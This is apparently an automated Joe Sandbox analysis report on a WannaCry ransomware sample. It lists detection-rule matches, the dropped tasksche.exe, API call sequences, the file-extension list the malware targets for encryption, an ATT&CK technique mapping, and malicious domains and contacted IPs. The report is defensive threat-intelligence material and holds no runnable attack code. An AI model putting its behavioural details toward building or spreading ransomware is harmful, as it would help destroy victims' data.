          Source: 00000001.00000000.305783465.0000000000710000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
          Source: 00000001.00000002.577194979.0000000002508000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
          Source: 00000001.00000002.576443116.0000000001FD6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
          Source: 00000000.00000000.302374348.0000000000710000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
          Source: 00000001.00000002.575749236.0000000000710000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
          Source: 00000000.00000002.311470610.0000000000710000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
          Source: C:\Windows\tasksche.exe, type: DROPPEDMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
          Source: C:\Windows\tasksche.exe, type: DROPPEDMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
          Source: C:\Windows\tasksche.exe, type: DROPPEDMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
          Source: C:\Users\user\Desktop\Ee3RWj3ID9.exeFile created: C:\WINDOWS\tasksche.exeJump to behavior
          Source: C:\Windows\tasksche.exeCode function: 2_2_00406C402_2_00406C40
          Source: C:\Windows\tasksche.exeCode function: 2_2_00402A762_2_00402A76
          Source: C:\Windows\tasksche.exeCode function: 2_2_00402E7E2_2_00402E7E
          Source: C:\Windows\tasksche.exeCode function: 2_2_0040350F2_2_0040350F
          Source: C:\Windows\tasksche.exeCode function: 2_2_00404C192_2_00404C19
          Source: C:\Windows\tasksche.exeCode function: 2_2_0040541F2_2_0040541F
          Source: C:\Windows\tasksche.exeCode function: 2_2_004037972_2_00403797
          Source: C:\Windows\tasksche.exeCode function: 2_2_004043B72_2_004043B7
          Source: C:\Windows\tasksche.exeCode function: 2_2_004031BC2_2_004031BC
          Source: Ee3RWj3ID9.exeStatic PE information: Resource name: R type: PE32 executable (GUI) Intel 80386, for MS Windows
          Source: tasksche.exe.0.drStatic PE information: Resource name: XIA type: Zip archive data, at least v2.0 to extract, compression method=deflate
          Source: Ee3RWj3ID9.exeVirustotal: Detection: 81%
          Source: C:\Users\user\Desktop\Ee3RWj3ID9.exeFile read: C:\Users\user\Desktop\Ee3RWj3ID9.exeJump to behavior
          Source: Ee3RWj3ID9.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\Ee3RWj3ID9.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\Ee3RWj3ID9.exe C:\Users\user\Desktop\Ee3RWj3ID9.exe
          Source: unknownProcess created: C:\Users\user\Desktop\Ee3RWj3ID9.exe C:\Users\user\Desktop\Ee3RWj3ID9.exe -m security
          Source: C:\Users\user\Desktop\Ee3RWj3ID9.exeProcess created: C:\Windows\tasksche.exe C:\WINDOWS\tasksche.exe /i
          Source: C:\Users\user\Desktop\Ee3RWj3ID9.exeProcess created: C:\Windows\tasksche.exe C:\WINDOWS\tasksche.exe /iJump to behavior
          Source: C:\Users\user\Desktop\Ee3RWj3ID9.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
          Source: classification engineClassification label: mal100.rans.expl.evad.winEXE@4/1@4/100
          Source: C:\Users\user\Desktop\Ee3RWj3ID9.exeCode function: sprintf,OpenSCManagerA,InternetCloseHandle,CreateServiceA,CloseServiceHandle,StartServiceA,CloseServiceHandle,CloseServiceHandle,0_2_00407C40
          Source: C:\Users\user\Desktop\Ee3RWj3ID9.exeCode function: sprintf,OpenSCManagerA,InternetCloseHandle,CreateServiceA,CloseServiceHandle,StartServiceA,CloseServiceHandle,CloseServiceHandle,1_2_00407C40
          Source: C:\Windows\tasksche.exeCode function: OpenSCManagerA,OpenServiceA,StartServiceA,CloseServiceHandle,sprintf,CreateServiceA,StartServiceA,CloseServiceHandle,CloseServiceHandle,2_2_00401CE8
          Source: C:\Users\user\Desktop\Ee3RWj3ID9.exeCode function: 0_2_00408090 GetModuleFileNameA,__p___argc,OpenSCManagerA,InternetCloseHandle,OpenServiceA,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,StartServiceCtrlDispatcherA,0_2_00408090
          Source: C:\Users\user\Desktop\Ee3RWj3ID9.exeCode function: 1_2_00408090 GetModuleFileNameA,__p___argc,OpenSCManagerA,InternetCloseHandle,OpenServiceA,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,StartServiceCtrlDispatcherA,1_2_00408090
          Source: C:\Users\user\Desktop\Ee3RWj3ID9.exeCode function: 0_2_00407C40 sprintf,OpenSCManagerA,InternetCloseHandle,CreateServiceA,CloseServiceHandle,StartServiceA,CloseServiceHandle,CloseServiceHandle,0_2_00407C40
          Source: C:\Users\user\Desktop\Ee3RWj3ID9.exeCode function: 0_2_00407CE0 InternetCloseHandle,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessA,FindResourceA,LoadResource,LockResource,SizeofResource,sprintf,sprintf,sprintf,MoveFileExA,CreateFileA,WriteFile,FindCloseChangeNotification,CreateProcessA,CloseHandle,CloseHandle,0_2_00407CE0
          Source: tasksche.exe, 00000002.00000002.310462960.000000000040E000.00000008.00000001.01000000.00000005.sdmp, Ee3RWj3ID9.exe, tasksche.exe.0.drBinary or memory string: @.der.pfx.key.crt.csr.p12.pem.odt.ott.sxw.stw.uot.3ds.max.3dm.ods.ots.sxc.stc.dif.slk.wb2.odp.otp.sxd.std.uop.odg.otg.sxm.mml.lay.lay6.asc.sqlite3.sqlitedb.sql.accdb.mdb.db.dbf.odb.frm.myd.myi.ibd.mdf.ldf.sln.suo.cs.c.cpp.pas.h.asm.js.cmd.bat.ps1.vbs.vb.pl.dip.dch.sch.brd.jsp.php.asp.rb.java.jar.class.sh.mp3.wav.swf.fla.wmv.mpg.vob.mpeg.asf.avi.mov.mp4.3gp.mkv.3g2.flv.wma.mid.m3u.m4u.djvu.svg.ai.psd.nef.tiff.tif.cgm.raw.gif.png.bmp.jpg.jpeg.vcd.iso.backup.zip.rar.7z.gz.tgz.tar.bak.tbk.bz2.PAQ.ARC.aes.gpg.vmx.vmdk.vdi.sldm.sldx.sti.sxi.602.hwp.snt.onetoc2.dwg.pdf.wk1.wks.123.rtf.csv.txt.vsdx.vsd.edb.eml.msg.ost.pst.potm.potx.ppam.ppsx.ppsm.pps.pot.pptm.pptx.ppt.xltm.xltx.xlc.xlm.xlt.xlw.xlsb.xlsm.xlsx.xls.dotx.dotm.dot.docm.docb.docx.docWANACRY!%s\%sCloseHandleDeleteFileWMoveFileExWMoveFileWReadFileWriteFileCreateFileWkernel32.dll
          Source: C:\Users\user\Desktop\Ee3RWj3ID9.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\Ee3RWj3ID9.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\Ee3RWj3ID9.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\Ee3RWj3ID9.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: Ee3RWj3ID9.exeStatic file information: File size 3723264 > 1048576
          Source: Ee3RWj3ID9.exeStatic PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x35b000
          Source: C:\Windows\tasksche.exeCode function: 2_2_00407710 push eax; ret 2_2_0040773E
          Source: C:\Windows\tasksche.exeCode function: 2_2_004076C8 push eax; ret 2_2_004076E6
          Source: C:\Windows\tasksche.exeCode function: 2_2_00401A45 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,2_2_00401A45

          Persistence and Installation Behavior

          barindex
          Drops executables to the windows directory (C:\Windows) and starts them
          Source: C:\Users\user\Desktop\Ee3RWj3ID9.exeExecutable created and started: C:\WINDOWS\tasksche.exeJump to behavior
          Source: C:\Users\user\Desktop\Ee3RWj3ID9.exeFile created: C:\Windows\tasksche.exeJump to dropped file
          Source: C:\Users\user\Desktop\Ee3RWj3ID9.exeFile created: C:\Windows\tasksche.exeJump to dropped file
          Source: C:\Users\user\Desktop\Ee3RWj3ID9.exeCode function: 0_2_00407C40 sprintf,OpenSCManagerA,InternetCloseHandle,CreateServiceA,CloseServiceHandle,StartServiceA,CloseServiceHandle,CloseServiceHandle,0_2_00407C40
          Source: C:\Users\user\Desktop\Ee3RWj3ID9.exe TID: 4588Thread sleep count: 109 > 30Jump to behavior
          Source: C:\Users\user\Desktop\Ee3RWj3ID9.exe TID: 4572Thread sleep count: 112 > 30Jump to behavior
          Source: C:\Users\user\Desktop\Ee3RWj3ID9.exe TID: 4588Thread sleep count: 43 > 30Jump to behavior
          Source: Ee3RWj3ID9.exe, 00000000.00000002.312396815.0000000000D5C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: C:\Windows\tasksche.exeCode function: 2_2_00401A45 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,2_2_00401A45
          Source: C:\Windows\tasksche.exeCode function: 2_2_004029CC free,GetProcessHeap,HeapFree,2_2_004029CC

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid Accounts2
          Service Execution          		4
          Windows Service          		4
          Windows Service          		12
          Masquerading          		OS Credential Dumping1
          Network Share Discovery          		Remote Services1
          Archive Collected Data          		Exfiltration Over Other Network Medium22
          Encrypted Channel          		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
          Data Encrypted for Impact
          Default Accounts1
          Native API          		Boot or Logon Initialization Scripts1
          Process Injection          		1
          Virtualization/Sandbox Evasion          		LSASS Memory11
          Security Software Discovery          		Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth3
          Ingress Tool Transfer          		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)1
          Process Injection          		Security Account Manager1
          Virtualization/Sandbox Evasion          		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration3
          Non-Application Layer Protocol          		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
          Obfuscated Files or Information          		NTDS1
          Remote System Discovery          		Distributed Component Object ModelInput CaptureScheduled Transfer4
          Application Layer Protocol          		SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
          Software Packing          		LSA Secrets1
          System Information Discovery          		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          Ee3RWj3ID9.exe82%VirustotalBrowse
          Ee3RWj3ID9.exe100%AviraTR/Ransom.Gen
          Ee3RWj3ID9.exe100%Joe Sandbox ML

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Windows\tasksche.exe100%AviraTR/Ransom.Gen
          C:\Windows\tasksche.exe100%Joe Sandbox ML

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          2.2.tasksche.exe.400000.0.unpack100%AviraTR/Ransom.GenDownload File
          1.0.Ee3RWj3ID9.exe.400000.0.unpack100%AviraTR/Ransom.GenDownload File
          1.2.Ee3RWj3ID9.exe.2508948.9.unpack100%AviraHEUR/AGEN.1215476Download File
          0.0.Ee3RWj3ID9.exe.400000.0.unpack100%AviraTR/Ransom.GenDownload File
          0.2.Ee3RWj3ID9.exe.400000.0.unpack100%AviraTR/Ransom.GenDownload File
          1.2.Ee3RWj3ID9.exe.24f98c8.7.unpack100%AviraTR/Ransom.GenDownload File
          0.2.Ee3RWj3ID9.exe.7100a4.1.unpack100%AviraTR/Ransom.GenDownload File
          1.2.Ee3RWj3ID9.exe.1ff9128.5.unpack100%AviraTR/Ransom.GenDownload File
          1.2.Ee3RWj3ID9.exe.7100a4.1.unpack100%AviraTR/Ransom.GenDownload File
          1.0.Ee3RWj3ID9.exe.7100a4.1.unpack100%AviraTR/Ransom.GenDownload File
          1.2.Ee3RWj3ID9.exe.1fd6104.4.unpack100%AviraHEUR/AGEN.1215476Download File
          1.2.Ee3RWj3ID9.exe.1fc7084.2.unpack100%AviraTR/Ransom.GenDownload File
          0.0.Ee3RWj3ID9.exe.7100a4.1.unpack100%AviraTR/Ransom.GenDownload File
          2.0.tasksche.exe.400000.0.unpack100%AviraTR/Ransom.GenDownload File
          1.2.Ee3RWj3ID9.exe.400000.0.unpack100%AviraTR/Ransom.GenDownload File
          1.2.Ee3RWj3ID9.exe.252b96c.8.unpack100%AviraTR/Ransom.GenDownload File

          Domains

          SourceDetectionScannerLabelLink
          www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff.com13%VirustotalBrowse
          ww38.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff.com13%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff.comJ0%URL Reputationsafe
          http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff.com100%URL Reputationmalware
          http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff.com/100%URL Reputationmalware
          http://ww38.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff.com/y9X100%Avira URL Cloudmalware
          http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff.com/:;P100%Avira URL Cloudmalware
          http://ww38.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff.com/(100%Avira URL Cloudmalware
          http://ww38.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff.com/13%VirustotalBrowse
          http://ww38.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff.com/100%Avira URL Cloudmalware

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          701602.parkingcrew.net
          		13.248.148.254
          		truefalse
            		high
            www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff.com
            		103.224.212.220
            		truefalseunknown
            ww38.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff.com
            		unknown
            		unknownfalseunknown

            Contacted URLs

            NameMaliciousAntivirus DetectionReputation
            http://ww38.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff.com/true
            • 13%, Virustotal, Browse
            • Avira URL Cloud: malware
            		unknown
            http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff.com/true
            • URL Reputation: malware
            		unknown

            URLs from Memory and Binaries

            NameSourceMaliciousAntivirus DetectionReputation
            http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff.com/:;PEe3RWj3ID9.exe, 00000000.00000002.312375823.0000000000D52000.00000004.00000020.00020000.00000000.sdmptrue
            • Avira URL Cloud: malware
            		unknown
            http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff.comJEe3RWj3ID9.exe, 00000001.00000002.575642878.000000000019C000.00000004.00000010.00020000.00000000.sdmptrue
            • URL Reputation: safe
            		unknown
            http://ww38.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff.com/(Ee3RWj3ID9.exe, 00000000.00000002.312375823.0000000000D52000.00000004.00000020.00020000.00000000.sdmptrue
            • Avira URL Cloud: malware
            		unknown
            http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff.comEe3RWj3ID9.exetrue
            • URL Reputation: malware
            		unknown
            http://ww38.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff.com/y9XEe3RWj3ID9.exe, 00000000.00000002.312375823.0000000000D52000.00000004.00000020.00020000.00000000.sdmptrue
            • Avira URL Cloud: malware
            		unknown

            World Map of Contacted IPs

            • No. of IPs < 25%
            • 25% < No. of IPs < 50%
            • 50% < No. of IPs < 75%
            • 75% < No. of IPs

            Public IPs

            IPDomainCountryFlagASNASN NameMalicious
            66.65.12.202
            		unknownUnited States
            		12271TWC-12271-NYCUSfalse
            167.121.32.220
            		unknownUnited States
            		10662NORFOLK-SOUTHERNUSfalse
            159.123.188.116
            		unknownUnited States
            		36351SOFTLAYERUSfalse
            65.204.156.149
            		unknownUnited States
            		701UUNETUSfalse
            62.195.84.201
            		unknownNetherlands
            		6830LIBERTYGLOBALLibertyGlobalformerlyUPCBroadbandHoldingfalse
            196.63.174.111
            		unknownSouth Africa
            		37518FIBERGRIDSCfalse
            41.211.127.159
            		unknownCameroon
            		36955Matrix-ASN1CMfalse
            195.83.42.167
            		unknownFrance
            		2200FR-RENATERReseauNationaldetelecommunicationspourlaTecfalse
            69.250.8.143
            		unknownUnited States
            		7922COMCAST-7922USfalse
            136.160.88.69
            		unknownUnited States
            		11131UMBC-ASUSfalse
            16.100.63.210
            		unknownUnited States
            		unknownunknownfalse
            98.172.152.79
            		unknownUnited States
            		22773ASN-CXA-ALL-CCI-22773-RDCUSfalse
            26.30.171.199
            		unknownUnited States
            		7922COMCAST-7922USfalse
            202.28.49.169
            		unknownThailand
            		132514UBU-AS-APUbonRatchathaniUniversityTHfalse
            209.21.250.79
            		unknownUnited States
            		2828XO-AS15USfalse
            33.114.44.66
            		unknownUnited States
            		2686ATGS-MMD-ASUSfalse
            60.77.140.187
            		unknownJapan17676GIGAINFRASoftbankBBCorpJPfalse
            194.228.32.35
            		unknownCzech Republic
            		5610O2-CZECH-REPUBLICCZfalse
            85.64.70.167
            		unknownIsrael
            		1680NV-ASNCELLCOMltdILfalse
            61.137.118.251
            		unknownChina
            		4134CHINANET-BACKBONENo31Jin-rongStreetCNfalse
            197.101.109.121
            		unknownSouth Africa
            		3741ISZAfalse
            93.37.155.86
            		unknownItaly
            		12874FASTWEBITfalse
            208.76.35.40
            		unknownUnited States
            		26938COMPUSOURCEUSfalse
            214.196.9.218
            		unknownUnited States
            		721DNIC-ASBLK-00721-00726USfalse
            187.110.86.37
            		unknownBrazil
            		28624PROVEDORACMAINTERNETLTDABRfalse
            146.100.169.109
            		unknownItaly
            		31822CITY-UNIVERSITY-OF-NEW-YORKUSfalse
            120.168.113.30
            		unknownIndonesia
            		4761INDOSAT-INP-APINDOSATInternetNetworkProviderIDfalse
            23.87.188.211
            		unknownUnited States
            		395954LEASEWEB-USA-LAX-11USfalse
            126.101.73.219
            		unknownJapan17676GIGAINFRASoftbankBBCorpJPfalse
            201.31.75.102
            		unknownBrazil
            		4230CLAROSABRfalse
            119.105.249.194
            		unknownJapan2516KDDIKDDICORPORATIONJPfalse
            92.8.246.208
            		unknownUnited Kingdom
            		13285OPALTELECOM-ASTalkTalkCommunicationsLimitedGBfalse
            40.87.11.54
            		unknownUnited States
            		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
            98.4.248.81
            		unknownUnited States
            		11351TWC-11351-NORTHEASTUSfalse
            143.107.249.249
            		unknownBrazil
            		28571UNIVERSIDADEDESAOPAULOBRfalse
            52.83.141.237
            		unknownChina
            		135629WESTCLOUDDATANingxiaWestCloudDataTechnologyCoLtdCNfalse
            9.246.153.157
            		unknownUnited States
            		3356LEVEL3USfalse
            173.20.230.31
            		unknownUnited States
            		30036MEDIACOM-ENTERPRISE-BUSINESSUSfalse
            204.50.220.88
            		unknownCanada
            		812ROGERS-COMMUNICATIONSCAfalse
            13.57.247.31
            		unknownUnited States
            		16509AMAZON-02USfalse
            150.94.153.50
            		unknownJapan6400CompaniaDominicanadeTelefonosSADOfalse
            3.86.199.106
            		unknownUnited States
            		14618AMAZON-AESUSfalse
            96.220.1.218
            		unknownUnited States
            		7922COMCAST-7922USfalse
            78.66.190.167
            		unknownSweden
            		3301TELIANET-SWEDENTeliaCompanySEfalse
            57.71.177.143
            		unknownBelgium
            		51964ORANGE-BUSINESS-SERVICES-IPSN-ASNFRfalse
            78.230.204.151
            		unknownFrance
            		12322PROXADFRfalse
            179.116.173.64
            		unknownBrazil
            		26599TELEFONICABRASILSABRfalse
            120.202.98.183
            		unknownChina
            		9808CMNET-GDGuangdongMobileCommunicationCoLtdCNfalse
            104.200.248.133
            		unknownUnited States
            		204957GREENFLOID-ASUAfalse
            149.97.194.110
            		unknownUnited States
            		16553EQUINIX-EC-MIUSfalse
            184.244.199.148
            		unknownUnited States
            		10507SPCSUSfalse
            187.122.229.72
            		unknownBrazil
            		28573CLAROSABRfalse
            203.224.201.4
            		unknownKorea Republic of
            		9273SICC-ASSsangyongKRfalse
            88.20.10.78
            		unknownSpain
            		3352TELEFONICA_DE_ESPANAESfalse
            199.55.12.238
            		unknownUnited States
            		398192ARDOT-NET-01USfalse
            1.88.110.132
            		unknownChina
            		17429BGCTVNETBEIJINGGEHUACATVNETWORKCOLTDCNfalse
            131.58.144.169
            		unknownUnited States
            		386AFCONC-BLOCK1-ASUSfalse
            69.16.114.253
            		unknownUnited States
            		1968UMASSP-DOMUSfalse
            98.231.18.204
            		unknownUnited States
            		7922COMCAST-7922USfalse
            92.19.2.75
            		unknownUnited Kingdom
            		13285OPALTELECOM-ASTalkTalkCommunicationsLimitedGBfalse
            213.162.168.208
            		unknownNetherlands
            		9136WOBCOMDEfalse
            216.8.112.90
            		unknownUnited States
            		32707UHHSUSfalse
            93.18.225.220
            		unknownFrance
            		15557LDCOMNETFRfalse
            175.50.100.97
            		unknownChina
            		134810CMNET-JILIN-AS-APChinaMobileGroupJiLincommunicationscofalse
            8.220.214.135
            		unknownSingapore
            		45102CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdCfalse
            75.102.117.115
            		unknownUnited States
            		3999PENN-STATEUSfalse
            114.238.83.136
            		unknownChina
            		4134CHINANET-BACKBONENo31Jin-rongStreetCNfalse

            Private

            IP
            192.168.2.148
            192.168.2.149
            192.168.2.146
            192.168.2.147
            192.168.2.140
            192.168.2.141
            192.168.2.144
            192.168.2.145
            192.168.2.142
            192.168.2.143
            192.168.2.159
            192.168.2.157
            192.168.2.158
            192.168.2.151
            192.168.2.152
            192.168.2.150
            192.168.2.155
            192.168.2.156
            192.168.2.153
            192.168.2.154
            192.168.2.126
            192.168.2.127
            192.168.2.124
            192.168.2.125
            192.168.2.128
            192.168.2.129
            192.168.2.122
            192.168.2.123
            192.168.2.120
            192.168.2.121
            192.168.2.137
            192.168.2.138
            192.168.2.135

            General Information

            Joe Sandbox Version:36.0.0 Rainbow Opal
            Analysis ID:722444
            Start date and time:2022-10-13 14:52:12 +02:00
            Joe Sandbox Product:CloudBasic
            Overall analysis duration:0h 5m 43s
            Hypervisor based Inspection enabled:false
            Report type:full
            Sample file name:Ee3RWj3ID9.exe
            Cookbook file name:default.jbs
            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
            Number of analysed new started processes analysed:6
            Number of new started drivers analysed:0
            Number of existing processes analysed:0
            Number of existing drivers analysed:0
            Number of injected processes analysed:0
            Technologies:
            • HCA enabled
            • EGA enabled
            • HDC enabled
            • AMSI enabled
            Analysis Mode:default
            Analysis stop reason:Timeout
            Detection:MAL
            Classification:mal100.rans.expl.evad.winEXE@4/1@4/100
            EGA Information:Failed
            HDC Information:
            • Successful, ratio: 99.4% (good quality ratio 90.1%)
            • Quality average: 76.7%
            • Quality standard deviation: 32.6%
            HCA Information:Failed
            Cookbook Comments:
            • Found application associated with file extension: .exe

            Warnings

            • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, conhost.exe
            • Not all processes where analyzed, report is missing behavior information
            • Report size getting too big, too many NtDeviceIoControlFile calls found.
            • Report size getting too big, too many NtQueryValueKey calls found.

            Simulations

            Behavior and APIs

            No simulations

            Joe Sandbox View / Context

            IPs

            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
            197.101.109.121bk.arm7-20220929-1806.elfGet hashmaliciousBrowse
              Sz45LdfKVFGet hashmaliciousBrowse
                UnHAnaAW.ppcGet hashmaliciousBrowse

                  Domains

                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                  701602.parkingcrew.netYB7v7UFV3j.exeGet hashmaliciousBrowse
                  • 76.223.26.96
                  B0U3oOhQJu.exeGet hashmaliciousBrowse
                  • 76.223.26.96
                  1WImqfBvqH.dllGet hashmaliciousBrowse
                  • 76.223.26.96
                  zTg6FfsIq1.exeGet hashmaliciousBrowse
                  • 76.223.26.96
                  8ML9vWcUAh.dllGet hashmaliciousBrowse
                  • 76.223.26.96
                  e9TfH3jxO1.exeGet hashmaliciousBrowse
                  • 76.223.26.96
                  6jtNVDiwz9.exeGet hashmaliciousBrowse
                  • 76.223.26.96
                  tkxl2AyS35.exeGet hashmaliciousBrowse
                  • 76.223.26.96
                  vcLgaDtq2Y.exeGet hashmaliciousBrowse
                  • 13.248.148.254
                  wS1IlhGZ6O.exeGet hashmaliciousBrowse
                  • 13.248.148.254
                  DWs0ZsrcWc.exeGet hashmaliciousBrowse
                  • 13.248.148.254
                  iH34IwDgCX.exeGet hashmaliciousBrowse
                  • 13.248.148.254
                  UKfz9ypQ3N.exeGet hashmaliciousBrowse
                  • 76.223.26.96
                  7jLUw8OOEn.exeGet hashmaliciousBrowse
                  • 13.248.148.254
                  upCVNgNwCr.dllGet hashmaliciousBrowse
                  • 13.248.148.254
                  tNTBg40iVN.exeGet hashmaliciousBrowse
                  • 13.248.148.254
                  rRhN2d6O0L.exeGet hashmaliciousBrowse
                  • 76.223.26.96
                  gHzphO4pht.exeGet hashmaliciousBrowse
                  • 76.223.26.96
                  3C4448ECE87D915A3BE7C71F4F6C99828849AE0AAE5F2.exeGet hashmaliciousBrowse
                  • 76.223.26.96
                  5A5158C712E1588C621124B5DC4B0C3EBFC064FFC0E2C.exeGet hashmaliciousBrowse
                  • 13.248.148.254

                  ASNs

                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                  TWC-12271-NYCUSx86.elfGet hashmaliciousBrowse
                  • 74.73.184.205
                  iH34IwDgCX.exeGet hashmaliciousBrowse
                  • 104.162.234.148
                  IhWFtMpAjV.elfGet hashmaliciousBrowse
                  • 158.222.204.248
                  q3HBd2AE4K.elfGet hashmaliciousBrowse
                  • 24.103.245.2
                  tjMJLY5Jml.elfGet hashmaliciousBrowse
                  • 98.15.44.87
                  fgN37hMGy9.elfGet hashmaliciousBrowse
                  • 67.245.31.179
                  jxoWRtiijs.elfGet hashmaliciousBrowse
                  • 72.227.159.187
                  DRL8J3CIbk.elfGet hashmaliciousBrowse
                  • 67.245.13.111
                  3DOOpcyTKj.elfGet hashmaliciousBrowse
                  • 184.74.198.113
                  WrTrAHLpf8.elfGet hashmaliciousBrowse
                  • 67.254.190.17
                  boat.arm-20220930-1611.elfGet hashmaliciousBrowse
                  • 67.254.25.240
                  fursro1cJb.elfGet hashmaliciousBrowse
                  • 24.161.107.215
                  py1AN0kk3c.elfGet hashmaliciousBrowse
                  • 104.162.153.132
                  m1mjMzSFKO.exeGet hashmaliciousBrowse
                  • 158.222.211.81
                  aWoyoSGAsv.elfGet hashmaliciousBrowse
                  • 98.12.83.234
                  5tjU8p5MR2.elfGet hashmaliciousBrowse
                  • 67.254.230.221
                  g2EQhyk6v4.elfGet hashmaliciousBrowse
                  • 142.105.86.92
                  QQlbAyRysQ.elfGet hashmaliciousBrowse
                  • 208.120.57.127
                  XLXMoLbdzu.elfGet hashmaliciousBrowse
                  • 74.68.251.117
